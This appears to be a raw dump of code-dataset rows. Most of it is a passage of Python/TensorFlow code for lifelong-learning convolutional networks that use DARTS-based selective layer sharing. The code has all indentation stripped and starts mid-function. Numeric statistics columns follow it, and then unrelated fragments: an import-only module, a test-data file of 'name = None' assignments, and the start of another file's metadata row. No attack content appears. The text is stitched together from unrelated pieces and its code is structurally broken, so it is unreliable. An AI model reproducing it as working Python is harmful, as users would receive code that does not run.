lower_model, _, _, _, _ = new_darts_cnn_fc_net(self.x_batch[self.current_task], self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[self.output_sizes[self.current_task]], cnn_activation_fn=self.hidden_act, cnn_shared_params=approx_params_lower[0:2*self.num_conv_layers], cnn_TS_params=approx_params_lower[2*self.num_conv_layers:4*self.num_conv_layers], select_params=self.conv_select_params, fc_activation_fn=self.hidden_act, fc_params=approx_params_lower[4*self.num_conv_layers:], padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, input_size=self.input_size[0:2])
lower_loss = self._loss_func(self.y_batch[self.current_task], lower_model[-1])
lower_grad = tf.gradients(lower_loss, self.conv_select_params)
#self.selection_grads = [g-(self.learn_rate/(1.0+self.epoch*self.learn_rate_decay)/(2*r))*(u-l) for (g, r, u, l) in zip(selection_grads, ratios, upper_grad, lower_grad)]
self.selection_grads = [g-(self.learn_rate/(2*r))*(u-l) for (g, r, u, l) in zip(selection_grads, ratios, upper_grad, lower_grad)]
trainer2 = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.selection_update = trainer2.apply_gradients(list(zip(self.selection_grads, self.conv_select_params)))
def convert_tfVar_to_npVar(self, sess):
if not (self.num_tasks == 1 and self.task_is_new):
orig_KB = list(self.np_params[0]['Shared_Conv']) ## copy of shared conv before training current task
else:
orig_KB = [None for _ in range(2*self.num_conv_layers)]
def list_param_converter(list_of_params):
converted_params = []
for p in list_of_params:
if type(p) == np.ndarray:
converted_params.append(p)
elif _tf_tensor(p):
converted_params.append(sess.run(p))
else:
converted_params.append(p) ## append 'None' param
return converted_params
def double_list_param_converter(list_of_params):
converted_params = []
for task_params in list_of_params:
converted_params.append(list_param_converter(task_params))
return converted_params
def post_process(layers_to_share, original_KB, updated_KB, updated_conv):
for layer_cnt, (sharing_flag) in enumerate(layers_to_share):
if sharing_flag:
### Sharing this layer -> use new KB, TS and generated conv (no action needed), and make conv param None
updated_conv[self.current_task][2*layer_cnt], updated_conv[self.current_task][2*layer_cnt+1] = None, None
else:
### Not sharing this layer -> roll back KB, make TS and generated conv None, and keep conv param (no action needed)
updated_KB[2*layer_cnt], updated_KB[2*layer_cnt+1] = original_KB[2*layer_cnt], original_KB[2*layer_cnt+1]
return updated_KB, updated_conv
self.np_params = []
if len(self.conv_sharing) < self.num_tasks:
self.conv_sharing.append(self.darts_learned_selection(sess))
np_shared = list_param_converter(self.shared_conv_params)
np_TS = double_list_param_converter(self.conv_params)
np_fc = double_list_param_converter(self.fc_params)
np_shared, np_TS = post_process(self.conv_sharing[self.current_task], orig_KB, np_shared, np_TS)
for t, f in zip(np_TS, np_fc):
self.np_params.append({'Shared_Conv': np_shared, 'TS_Conv': t, 'FC': f} if len(self.np_params)< 1 else {'TS_Conv': t, 'FC': f})
def _collect_trainable_variables(self):
return_list = []
for p in self.shared_conv_params:
if p is not None:
return_list.append(p)
for p in self.conv_params[-1]:
if p is not None:
return_list.append(p)
for p in self.fc_params[-1]:
if p is not None:
return_list.append(p)
return return_list
def train_one_epoch(self, sess, data_x, data_y, epoch_cnt, task_index, learning_indices=None, augment_data=False, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_train = data_x.shape[0]
if learning_indices is None:
learning_indices = list(range(num_train))
shuffle(learning_indices)
for batch_cnt in range(num_train//self.batch_size):
batch_train_x = data_x[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
batch_train_y = data_y[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
if self.task_is_new:
## Update architecture (selection param)
sess.run(self.selection_update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
## Update NN weights
sess.run(self.update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
def eval_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, num_classes = data_x.shape[0], self.output_sizes[task_model_index]
eval_output = np.zeros([num_data, num_classes], dtype=np.float32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
eval_func = self.eval_for_new_task[best_config]
else:
eval_func = self.eval[task_model_index]
for batch_cnt in range(num_batch):
eval_output[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = sess.run(eval_func, feed_dict={self.model_input: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
temp_pred = sess.run(eval_func, feed_dict={self.model_input: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
eval_output[-num_remains:] = temp_pred[0:num_remains]
return eval_output
def infer_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data = data_x.shape[0]
inferred_labels = np.zeros(num_data, dtype=np.int32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
pred_func = self.pred_for_new_task[best_config]
else:
pred_func = self.pred[task_model_index]
for batch_cnt in range(num_batch):
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
inferred_labels[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = np.squeeze(temp_pred)
if num_remains > 0:
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
inferred_labels[-num_remains:] = np.squeeze(temp_pred[0:num_remains])
return inferred_labels
def compute_accuracy_one_task(self, sess, data_x, data_y, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, accuracy = data_x.shape[0], 0.0
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
acc_func = self.accuracy_for_new_task[best_config]
else:
acc_func = self.accuracy[task_model_index]
for batch_cnt in range(num_batch):
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.true_output[task_model_index]: data_y[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
tmp_x, tmp_y = data_x_and_y_add_dummy(data_x[-num_remains:], data_y[-num_remains:], self.batch_size)
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: tmp_x, self.true_output[task_model_index]: tmp_y, self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
return float(accuracy)/float(num_data)
########################################################
#### DARTS (Differentiable Architecture Search) ####
#### based Selective Sharing baseline model ####
########################################################
class LL_DFCNN_DARTS_net(Lifelong_Model_Frame):
def __init__(self, model_hyperpara, train_hyperpara):
super().__init__(model_hyperpara, train_hyperpara)
self.dfcnn_KB_size = model_hyperpara['cnn_KB_sizes']
self.dfcnn_TS_size = model_hyperpara['cnn_TS_sizes']
self.dfcnn_stride_size = model_hyperpara['cnn_deconv_stride_sizes']
self.dfcnn_KB_reg_scale = model_hyperpara['regularization_scale'][1]
self.dfcnn_TS_reg_scale = model_hyperpara['regularization_scale'][3]
self.approx_order=model_hyperpara['darts_approx_order']
self.conv_sharing = []
def _possible_choices(input_subsets):
list_subsets = []
for c in [False, True]:
for elem in input_subsets:
list_subsets.append(elem+[c])
return list_subsets
self._possible_configs = [[]]
for layer_cnt in range(self.num_conv_layers):
self._possible_configs = _possible_choices(self._possible_configs)
self.num_possible_configs = len(self._possible_configs)
def _build_task_model(self, net_input, output_size, task_cnt, params=None, trainable=False):
if params is None:
params_KB, params_TS, params_conv, params_fc = None, None, None, None
else:
params_KB, params_TS, params_conv, params_fc = params['KB'], params['TS'], params['TS_Conv'], params['FC']
if params_conv is not None:
assert (len(params_conv) == 2*self.num_conv_layers), "Given trained parameters of conv doesn't match to the hyper-parameters!"
if params_fc is not None:
assert (len(params_fc) == 2*self.num_fc_layers), "Given trained parameters of fc doesn't match to the hyper-parameters!"
eval_net = []
if (task_cnt==self.current_task) and self.task_is_new:
## DARTS-based DF-CNN
with tf.name_scope('DARTS_DFCNN'):
task_net, _, dfcnn_TS_params, conv_params, conv_select_params, fc_params = new_darts_dfcnn_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, dfcnn_TS_activation_fn=None, fc_activation_fn=self.hidden_act, dfcnn_KB_params=params_KB, dfcnn_TS_params=params_TS, cnn_TS_params=params_conv, select_params=None, fc_params=params_fc, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, trainable=trainable, task_index=task_cnt)
self.conv_select_params = conv_select_params
## build network for evaluation
for conf in self._possible_configs:
net_tmp, _, _, _, _, _, _ = new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], conf, self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, cnn_para_activation_fn=None, cnn_KB_params=params_KB, cnn_TS_params=dfcnn_TS_params, cnn_params=conv_params, fc_activation_fn=self.hidden_act, fc_params=fc_params, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, task_index=task_cnt, skip_connections=list(self.skip_connect), trainable=trainable)
eval_net.append(net_tmp[-1])
else:
## DF-CNN with the learned configuration
task_net, _, dfcnn_TS_params, _, conv_params, _, fc_params = new_ELLA_flexible_cnn_deconv_tensordot_fc_net(net_input, self.cnn_kernel_size, self.cnn_channels_size, self.cnn_stride_size, list(self.fc_size)+[output_size], self.conv_sharing[task_cnt], self.dfcnn_KB_size, self.dfcnn_TS_size, self.dfcnn_stride_size, cnn_activation_fn=self.hidden_act, cnn_para_activation_fn=None, cnn_KB_params=params_KB, cnn_TS_params=params_TS, cnn_params=params_conv, fc_activation_fn=self.hidden_act, fc_params=params_fc, KB_reg_type=self.KB_l2_reg, TS_reg_type=self.TS_l2_reg, padding_type=self.padding_type, max_pool=self.max_pooling, pool_sizes=self.pool_size, dropout=self.dropout, dropout_prob=self.dropout_prob, task_index=task_cnt, skip_connections=list(self.skip_connect), trainable=trainable)
return task_net, eval_net, dfcnn_TS_params, conv_params, fc_params
def _build_whole_model(self):
for task_cnt, (num_classes, x_b) in enumerate(zip(self.output_sizes, self.x_batch)):
if (task_cnt==self.current_task) and (self.task_is_new):
param_to_reuse = {'KB': self.dfcnn_KB_params, 'TS': None, 'TS_Conv': None, 'FC': None}
else:
param_to_reuse = {'KB': self.dfcnn_KB_params, 'TS': self.np_params[task_cnt]['TS'], 'TS_Conv': self.np_params[task_cnt]['TS_Conv'], 'FC': self.np_params[task_cnt]['FC']}
task_net, eval_net, dfcnn_TS_params, conv_TS_params, fc_params = self._build_task_model(x_b, num_classes, task_cnt, params=param_to_reuse, trainable=(task_cnt==self.current_task))
self.task_models.append(task_net)
self.dfcnn_TS_params.append(dfcnn_TS_params)
self.conv_params.append(conv_TS_params)
self.fc_params.append(fc_params)
self.params.append(self._collect_trainable_variables())
self.num_trainable_var += count_trainable_var2(self.params[-1]) if task_cnt < 1 else count_trainable_var2(self.params[-1]) - self.dfcnn_KB_params_size
if len(eval_net) > 0:
self.darts_eval_models = eval_net
self.dfcnn_KB_trainable_param = get_list_of_valid_tensors(self.dfcnn_KB_params)
self.dfcnn_TS_trainable_param = get_list_of_valid_tensors(self.dfcnn_TS_params[self.current_task])
self.conv_trainable_param = get_list_of_valid_tensors(self.conv_params[self.current_task])
self.fc_trainable_param = get_list_of_valid_tensors(self.fc_params[self.current_task])
self.trainable_params = list(self.dfcnn_KB_trainable_param) + list(self.dfcnn_TS_trainable_param) + list(self.conv_trainable_param) + list(self.fc_trainable_param)
def add_new_task(self, output_dim, curr_task_index, single_input_placeholder=False):
self.conv_select_params, self.darts_eval_models = None, None
self._shared_param_init()
super().add_new_task(output_dim, curr_task_index, single_input_placeholder=single_input_placeholder)
def _shared_param_init(self):
self.dfcnn_TS_params = []
self.KB_l2_reg = tf.contrib.layers.l2_regularizer(scale=self.dfcnn_KB_reg_scale)
self.TS_l2_reg = tf.contrib.layers.l2_regularizer(scale=self.dfcnn_TS_reg_scale)
KB_init_val = self.np_params[0]['KB'] if hasattr(self, 'np_params') else [None for _ in range(self.num_conv_layers)]
self.dfcnn_KB_params = [new_ELLA_KB_param([1, self.dfcnn_KB_size[2*layer_cnt], self.dfcnn_KB_size[2*layer_cnt], self.dfcnn_KB_size[2*layer_cnt+1]], layer_cnt, 0, self.KB_l2_reg, KB_init_val[layer_cnt], True) for layer_cnt in range(self.num_conv_layers)]
self.dfcnn_KB_params_size = count_trainable_var2(self.dfcnn_KB_params)
def get_darts_selection_val(self, sess):
return get_value_of_valid_tensors(sess, self.conv_select_params)
def get_params_val(self, sess, use_npparams=True):
selection_params_val = self.get_darts_selection_val(sess)
if use_npparams:
KB_val = self.np_params[0]['KB']
TS_val = [np_p['TS'] for np_p in self.np_params]
TS_conv_val = [np_p['TS_Conv'] for np_p in self.np_params]
fc_val = [np_p['FC'] for np_p in self.np_params]
else:
KB_val = get_value_of_valid_tensors(sess, self.dfcnn_KB_params)
TS_val = [get_value_of_valid_tensors(sess, dfcnn_TS_param) for dfcnn_TS_param in self.dfcnn_TS_params]
TS_conv_val = [get_value_of_valid_tensors(sess, cnn_TS_param) for cnn_TS_param in self.conv_params]
fc_val = [get_value_of_valid_tensors(sess, fc_param) for fc_param in self.fc_params]
parameters_val = {}
parameters_val['DARTS_selection_param'] = savemat_wrapper(selection_params_val)
parameters_val['KB'] = savemat_wrapper(KB_val)
parameters_val['TS'] = savemat_wrapper_nested_list(TS_val)
parameters_val['TS_conv'] = savemat_wrapper_nested_list(TS_conv_val)
parameters_val['fc_weights'] = savemat_wrapper_nested_list(fc_val)
return parameters_val
def best_config(self, sess):
## return the index of appropriate sharing configuration (self._possible_configs) according to the value of DARTS selection parameters
selection_val = self.get_darts_selection_val(sess)
# argmax 0 -> task-specific / argmax 1 -> shared
selected_config_index = 0
for layer_cnt, (layer_select) in enumerate(selection_val):
selected_config_index = selected_config_index + np.argmax(layer_select) * (2**layer_cnt)
return selected_config_index
def darts_learned_selection(self, sess):
## return the list of decision (T:shared/F:task-specific) of sharing in each layer according to the value of DARTS selection parameters
## for elements of self.conv_sharing (e.g. 'bottom2' : [TTFFF..])
selection_val = self.get_darts_selection_val(sess)
sharing_flags = []
for layer_select in selection_val:
sharing_flags.append(np.argmax(layer_select))
return sharing_flags
def define_eval(self):
with tf.name_scope('Model_Eval'):
mask = tf.reshape(tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32), [self.batch_size, 1])
self.eval = [tf.nn.softmax(task_model[-1])*mask for task_model in self.task_models]
self.pred = [tf.argmax(task_model[-1]*mask, 1) for task_model in self.task_models]
if self.task_is_new:
self.eval_for_new_task = [tf.nn.softmax(task_model)*mask for task_model in self.darts_eval_models]
self.pred_for_new_task = [tf.argmax(task_model*mask, 1) for task_model in self.darts_eval_models]
def _loss_func(self, y1, y2):
return tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.cast(y1, tf.int32), logits=y2))
def define_loss(self):
with tf.name_scope('Model_Loss'):
self.loss = [self._loss_func(y_batch, task_model[-1]) for y_batch, task_model in zip(self.y_batch, self.task_models)]
def define_accuracy(self):
with tf.name_scope('Model_Accuracy'):
mask = tf.cast(tf.range(self.batch_size)<self.num_data_in_batch, dtype=tf.float32)
self.accuracy = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model[-1], 1), tf.cast(y_batch, tf.int64)), tf.float32)*mask) for y_batch, task_model in zip(self.y_batch, self.task_models)]
if self.task_is_new:
self.accuracy_for_new_task = [tf.reduce_sum(tf.cast(tf.equal(tf.argmax(task_model, 1), tf.cast(self.y_batch[self.current_task], tf.int64)), tf.float32)*mask) for task_model in self.darts_eval_models]
def define_opt(self):
with tf.name_scope('Optimization'):
reg_var = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
KB_reg_term2 = tf.contrib.layers.apply_regularization(self.KB_l2_reg, reg_var)
TS_reg_term2 = tf.contrib.layers.apply_regularization(self.TS_l2_reg, reg_var)
KB_grads = tf.gradients(self.loss[self.current_task] + KB_reg_term2, self.dfcnn_KB_trainable_param)
KB_grads_vars = [(grad, param) for grad, param in zip(KB_grads, self.dfcnn_KB_trainable_param)]
TS_grads = tf.gradients(self.loss[self.current_task] + TS_reg_term2, self.dfcnn_TS_trainable_param)
TS_grads_vars = [(grad, param) for grad, param in zip(TS_grads, self.dfcnn_TS_trainable_param)]
conv_grads = tf.gradients(self.loss[self.current_task], self.conv_trainable_param)
conv_grads_vars = [(grad, param) for grad, param in zip(conv_grads, self.conv_trainable_param)]
fc_grads = tf.gradients(self.loss[self.current_task], self.fc_trainable_param)
fc_grads_vars = [(grad, param) for grad, param in zip(fc_grads, self.fc_trainable_param)]
self.grads = list(KB_grads) + list(TS_grads) + list(conv_grads) + list(fc_grads)
trainer = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.update = trainer.apply_gradients(KB_grads_vars + TS_grads_vars + conv_grads_vars + fc_grads_vars)
if self.task_is_new:
if self.approx_order == 1:
self.selection_grads = tf.gradients(self.loss[self.current_task], self.conv_select_params)
elif self.approx_order == 2:
raise NotImplementedError("Not Implemented because of 2nd derivative Issue!")
trainer2 = tf.train.RMSPropOptimizer(learning_rate=self.learn_rate/(1.0+self.epoch*self.learn_rate_decay))
self.selection_update = trainer2.apply_gradients(list(zip(self.selection_grads, self.conv_select_params)))
def convert_tfVar_to_npVar(self, sess):
if not (self.num_tasks == 1 and self.task_is_new):
orig_KB = list(self.np_params[0]['KB']) ## copy of shared conv before training current task
else:
orig_KB = [None for _ in range(2*self.num_conv_layers)]
def list_param_converter(list_of_params):
converted_params = []
for p in list_of_params:
if type(p) == np.ndarray:
converted_params.append(p)
elif _tf_tensor(p):
converted_params.append(sess.run(p))
else:
converted_params.append(p) ## append 'None' param
return converted_params
def double_list_param_converter(list_of_params):
converted_params = []
for task_params in list_of_params:
converted_params.append(list_param_converter(task_params))
return converted_params
def post_process(layers_to_share, original_KB, updated_KB, updated_TS, updated_conv):
for layer_cnt, (sharing_flag) in enumerate(layers_to_share):
if sharing_flag:
### Sharing this layer -> use new KB, TS, and make conv param None
updated_conv[self.current_task][2*layer_cnt], updated_conv[self.current_task][2*layer_cnt+1] = None, None
else:
### Not sharing this layer -> roll back KB, make TS None, and keep conv param (no action needed)
updated_KB[layer_cnt] = original_KB[layer_cnt]
updated_TS[self.current_task][4*layer_cnt], updated_TS[self.current_task][4*layer_cnt+1] = None, None
updated_TS[self.current_task][4*layer_cnt+2], updated_TS[self.current_task][4*layer_cnt+3] = None, None
return updated_KB, updated_TS, updated_conv
self.np_params = []
if len(self.conv_sharing) < self.num_tasks:
self.conv_sharing.append(self.darts_learned_selection(sess))
np_KB = list_param_converter(self.dfcnn_KB_params)
np_TS = double_list_param_converter(self.dfcnn_TS_params)
np_conv = double_list_param_converter(self.conv_params)
np_fc = double_list_param_converter(self.fc_params)
np_KB, np_TS, np_conv = post_process(self.conv_sharing[self.current_task], orig_KB, np_KB, np_TS, np_conv)
for t, c, f in zip(np_TS, np_conv, np_fc):
self.np_params.append({'KB': np_KB, 'TS': t, 'TS_Conv': c, 'FC': f} if len(self.np_params)< 1 else {'TS': t, 'TS_Conv': c, 'FC': f})
def _collect_trainable_variables(self):
return_list = []
for p in self.dfcnn_KB_params:
if p is not None:
return_list.append(p)
for p in self.dfcnn_TS_params[-1]:
if p is not None:
return_list.append(p)
for p in self.conv_params[-1]:
if p is not None:
return_list.append(p)
for p in self.fc_params[-1]:
if p is not None:
return_list.append(p)
return return_list
def train_one_epoch(self, sess, data_x, data_y, epoch_cnt, task_index, learning_indices=None, augment_data=False, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_train = data_x.shape[0]
if learning_indices is None:
learning_indices = list(range(num_train))
shuffle(learning_indices)
for batch_cnt in range(num_train//self.batch_size):
batch_train_x = data_x[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
batch_train_y = data_y[learning_indices[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size]]
if self.task_is_new:
## Update architecture (selection param)
sess.run(self.selection_update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
## Update NN weights
sess.run(self.update, feed_dict={self.model_input[task_model_index]: batch_train_x, self.true_output[task_model_index]: batch_train_y, self.epoch: epoch_cnt, self.dropout_prob: dropout_prob})
def eval_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, num_classes = data_x.shape[0], self.output_sizes[task_model_index]
eval_output = np.zeros([num_data, num_classes], dtype=np.float32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
eval_func = self.eval_for_new_task[best_config]
else:
eval_func = self.eval[task_model_index]
for batch_cnt in range(num_batch):
eval_output[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = sess.run(eval_func, feed_dict={self.model_input: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
temp_pred = sess.run(eval_func, feed_dict={self.model_input: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
eval_output[-num_remains:] = temp_pred[0:num_remains]
return eval_output
def infer_one_task(self, sess, data_x, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data = data_x.shape[0]
inferred_labels = np.zeros(num_data, dtype=np.int32)
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
pred_func = self.pred_for_new_task[best_config]
else:
pred_func = self.pred[task_model_index]
for batch_cnt in range(num_batch):
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
inferred_labels[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size] = np.squeeze(temp_pred)
if num_remains > 0:
temp_pred = sess.run(pred_func, feed_dict={self.model_input[task_model_index]: data_x_add_dummy(data_x[-num_remains:], self.batch_size), self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
inferred_labels[-num_remains:] = np.squeeze(temp_pred[0:num_remains])
return inferred_labels
def compute_accuracy_one_task(self, sess, data_x, data_y, task_index, dropout_prob=1.0):
task_model_index = self.find_task_model(task_index)
num_data, accuracy = data_x.shape[0], 0.0
num_batch = num_data//self.batch_size
num_remains = num_data - self.batch_size*num_batch
if self.task_is_new and (self.current_task == task_model_index):
best_config = self.best_config(sess)
acc_func = self.accuracy_for_new_task[best_config]
else:
acc_func = self.accuracy[task_model_index]
for batch_cnt in range(num_batch):
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: data_x[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.true_output[task_model_index]: data_y[batch_cnt*self.batch_size:(batch_cnt+1)*self.batch_size], self.dropout_prob: dropout_prob, self.num_data_in_batch: self.batch_size})
if num_remains > 0:
tmp_x, tmp_y = data_x_and_y_add_dummy(data_x[-num_remains:], data_y[-num_remains:], self.batch_size)
accuracy += sess.run(acc_func, feed_dict={self.model_input[task_model_index]: tmp_x, self.true_output[task_model_index]: tmp_y, self.dropout_prob: dropout_prob, self.num_data_in_batch: num_remains})
return float(accuracy)/float(num_data) | 68.414925 | 797 | 0.703347 | 6,897 | 45,838 | 4.284327 | 0.045672 | 0.024975 | 0.028157 | 0.012657 | 0.932282 | 0.903042 | 0.881282 | 0.866831 | 0.838506 | 0.819114 | 0 | 0.007554 | 0.19137 | 45,838 | 670 | 798 | 68.414925 | 0.789646 | 0.05478 | 0 | 0.752852 | 0 | 0 | 0.021717 | 0.001511 | 0 | 0 | 0 | 0 | 0.007605 | 1 | 0.091255 | false | 0 | 0.015209 | 0.007605 | 0.163498 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
037ad973fbb6b149c3f1193e80451769ed489602 | 102 | py | Python | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | 1 | 2019-02-09T18:42:39.000Z | 2019-02-09T18:42:39.000Z | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | null | null | null | hfb/runner/factory.py | harshanarayana/hfb | c42a6d7da29ada5053e259195a4676835a6afa86 | [
"MIT"
] | null | null | null | from hfb.runner.framework import *
from hfb.runner.server import *
from hfb.runner.component import *
| 25.5 | 34 | 0.794118 | 15 | 102 | 5.4 | 0.466667 | 0.259259 | 0.481481 | 0.469136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 102 | 3 | 35 | 34 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
063f62470e9f4bb3ba3d11e3e1bdfca2242d0e7e | 128 | py | Python | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/completion/heavyStarPropagation/lib/_pkg1/_pkg1_0/_pkg1_0_1/_pkg1_0_1_0/_pkg1_0_1_0_1/_mod1_0_1_0_1_2.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | name1_0_1_0_1_2_0 = None
name1_0_1_0_1_2_1 = None
name1_0_1_0_1_2_2 = None
name1_0_1_0_1_2_3 = None
name1_0_1_0_1_2_4 = None | 14.222222 | 24 | 0.820313 | 40 | 128 | 1.875 | 0.175 | 0.266667 | 0.466667 | 0.533333 | 0.88 | 0.88 | 0.746667 | 0 | 0 | 0 | 0 | 0.318182 | 0.140625 | 128 | 9 | 25 | 14.222222 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
069095baed887bfdcd67bf53d43878a62de39721 | 41,488 | py | Python | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
] | 2 | 2022-02-07T07:01:42.000Z | 2022-02-07T07:05:50.000Z | PublicDataReader/PublicDataPortal/molit.py | jswoo/PublicDataReader | a90428982c4a4de0bc1bff279fcf0d2009f4d090 | [
"MIT"
